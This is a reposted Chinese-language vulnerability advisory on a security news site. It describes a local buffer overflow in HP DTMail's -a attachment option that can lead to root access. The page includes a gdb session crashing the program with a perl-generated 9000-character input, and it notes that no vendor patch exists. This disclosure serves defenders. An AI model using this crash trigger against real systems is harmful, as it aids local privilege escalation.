HP DTMail附件参数缓冲区溢出漏洞

| 网站首页 | 新闻中心 | 系统安全 | 网络安全 | 安全技术 | 下载中心 |

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

HP DTMail附件参数缓冲区溢出漏洞

HP DTMail附件参数缓冲区溢出漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-25 17:32:52

　　受影响系统：

　　HP dtmail 5.1b

　　描述：

　　HP DTMail是在桌面上使用的邮件客户端。

　　DTMail在处理-a选项参数时存在缓冲区溢出漏洞，本地攻击者可以利用此漏洞获得root用户权限。

　　以下gdb输出显示了这个漏洞：

　　gdb) r -a -a `perl -e 'print "A" x 9000'`

　　Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e

　　'print "A"x 9000'`

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　(no debugging symbols found)...(no debugging symbols found)...

　　Program received signal SIGSEGV, Segmentation fault.

　　warning: Hit heuristic-fence-post without finding

　　warning: enclosing function for address 0x4141414141414140

　　<*来源：Adriel T. Desautels

　　链接：http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt

　　*>

　　建议：

　　厂商补丁：

　　HP

　　目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

　　http://itrc.hp.com【转自世纪安全网 http://www.21safe.com】

文章录入：admin 责任编辑：admin

上一篇文章： Ingo Procmail驱动Shell命令执行漏洞

下一篇文章： IronWebMail目录遍历信息泄露漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

HP DTMail附件参数缓冲区
TikiWiki配置脚本jhot.p
安全警报：黑客发现Adob
小心喽！修改PDF文档可能
在PHP中执行系统外部命令
php-Calendar远程任意命
PRADO phonebook.php文件
使用SoftPerfect Bandwi
阿而卡特Speed Touch 51
惠普hpshopping.com购物

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
Copyright © 2006-2008　www.anquan365.com　安全365 建议使用1024*768分辨率及第三方浏览器对本站进行浏览